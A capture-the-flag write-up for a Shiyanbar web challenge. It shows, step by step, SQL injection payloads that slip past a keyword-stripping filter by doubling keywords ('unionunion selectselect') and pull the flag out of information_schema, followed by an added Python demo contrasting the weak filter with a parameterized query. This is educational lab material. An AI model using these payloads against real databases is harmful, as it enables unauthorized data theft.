Shiyanbar CTF-WEB

Shiyanbar CTF Problem Set - WEB

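I did not work through the challenges in order but jumped around. The purpose of writing this article is to record my approach to solving them; of course, if it also happens to help someone else, all the better, haha~~~. Fellow enthusiasts are welcome to get in touch.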


1. Simple SQL injection

Obtain the flag value through injection (submission format: flag{})
Challenge link: [http://ctf5.shiyanbar.com/423/web/]

Enter 1'
After submitting, the page reports an error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

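So the page should be vulnerable to string-type injection; checking with order by shows there are three columns.
Next, use a union query. Because the page filters keywords and field names, write each filtered keyword twice so that a working keyword is still left after the filter removes one copy.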

1' unionunion  selectselect  table_name  fromfrom  information_schema.tables wherewhere '1'='1

After submitting, the table names that come back include flag.

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag


1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

ID: 1' union select flag from flag where '1'='1
name: baloteli
ID: 1' union select flag from flag where '1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}
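
Added example (not part of the original write-up and not the challenge's own code): why a one-pass keyword-stripping filter like the one this challenge appears to use gives no protection, next to the parameterized query that does. The filter behaviour (delete each keyword followed by a space, once), the query shape, the table layout and the flag value are assumptions constructed for illustration; SQLite stands in for MySQL.

```python
import sqlite3

# Assumed blacklist: the page says only that keywords are filtered.
KEYWORDS = ("union", "select", "from", "where")

# Final input string from the write-up above.
PAGE_INPUT = "1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1"

def strip_once(value):
    """Hypothetical filter: delete each 'keyword + space' in a single pass."""
    for kw in KEYWORDS:
        value = value.replace(kw + " ", "")
    return value

def make_db():
    """In-memory stand-in for the challenge database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id TEXT, name TEXT);
        INSERT INTO users VALUES ('1', 'baloteli');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed_placeholder}');
    """)
    return db

def lookup_filtered(db, user_input):
    """Weak pattern: blacklist filter, then string concatenation."""
    sql = "SELECT name FROM users WHERE id = '" + strip_once(user_input) + "'"
    return {row[0] for row in db.execute(sql)}

def lookup_parameterized(db, user_input):
    """Hardened pattern: the input is bound as data and never parsed as SQL."""
    rows = db.execute("SELECT name FROM users WHERE id = ?", (user_input,))
    return {row[0] for row in rows}

if __name__ == "__main__":
    db = make_db()
    # The removed copy leaves a working keyword behind in every case.
    print(strip_once(PAGE_INPUT))
    # Filter + concatenation: rows from the flag table come back too.
    print(lookup_filtered(db, PAGE_INPUT))
    # Bound parameter: the whole string is compared to id and matches nothing.
    print(lookup_parameterized(db, PAGE_INPUT))
    print(lookup_parameterized(db, "1"))
```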
